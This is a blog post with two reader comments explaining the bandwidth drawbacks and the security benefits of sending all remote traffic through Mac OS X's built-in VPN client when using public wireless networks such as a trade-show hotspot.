Why Should a Remote User Route All Traffic Over a VPN?

This post is a follow-up to the article posted last week detailing how to setup OS X’s built-in VPN Server.

One of the cool new features in 10.4’s VPN client is the ability to send all traffic over the VPN.  As one reader noted, this is great for people using public access, like a wireless network at the upcoming MacWorld Expo.

Setting the VPN client to send all traffic over the VPN has several advantages, and two possible disadvantages.  First, the down side.

Disadvantages:
Consider the bandwidth available to your VPN server.  If you are on a corporate network, odds are you have a synchronous internet connection, meaning that the internet connections upstream bandwidth is equal to its down stream.  This is the case with the T1 at my office.  If your VPN server is using a consumer level broadband provider, odds are your connection is asynchronous.  This is often the case with DSL or cable modem connections.  The downstream might be a high as 8Mb, while the upstream is limited to 384Kb.  That is the case with my cable modem at home.

The problem occurs when you route all of your traffic through an asynchronous connection.  If the downstream is 8MB and the upstream is 384Kb and I am running my VPN Server from that network, the fastest my VPN client will be able to either send or receive data will be at 384Kb.  This is because all traffic is essentially being funneled through the asynchronous network connection before it arrives at the VPN client.  Even if your clients access point might offer higher speed access, this performance bottleneck will keep you from surfing at the speeds you might expect.  Also, keep in mind that several VPN users in this situation can use up the available bandwidth much quicker than you expect.

Advantages:
As for the advantages, there are many worth considering.  For example, say you are accessing a wireless hotspot from the MacWorld show floor.  If you understand how wireless networks function, you realize that everyone on that same wireless node has the ability to sniff your data, unless it’s encrypted.  That means that your mail servers POP3 login information is sent in the clear for anyone to literally grab out of thin air.  So are the contents of your email messages for that matter.  The same goes for your FTP login, or any telnet access.

When you route all traffic through the VPN tunnel, you effectively protect all of that data.  Since the data is passing through the tunnel (both incoming and outgoing), it is unreadable to anyone between you and your VPN server.  Once the traffic reaches the VPN Server, it is no longer encrypted and it flows out onto the internet as needed to reach its intended destination.  By then, your data is clear of the danger zone.  The VPN connection makes you data as safe as it would be if you were sitting right beside the VPN server.


The Mac OS X VPN client application, Internet Connect.app

This concept is important to consider when you realize that once someone has access to your email login, they have full control over your email.  And if you plan on blogging from the show floor, this may be the only way to stay truly secure.  If consider any of your internet based traffic confidential, this really is the best way to go.


Steve

2 Responses to Why Should a Remote User Route All Traffic Over a VPN?
  1. Anonymous Reply

    Would that work with a T1 line? Remains to be seen.

  2. smanke Reply

    If you’re thinking of connecting to a VPN from the Mac VPN client, you should still be able to route all traffic over the tunnel, if the device serving the tunnel supports it. I have done it over a VPN direct to a Linksys router.

Leave a Reply

Your email address will not be published. Please enter your name, email and a comment.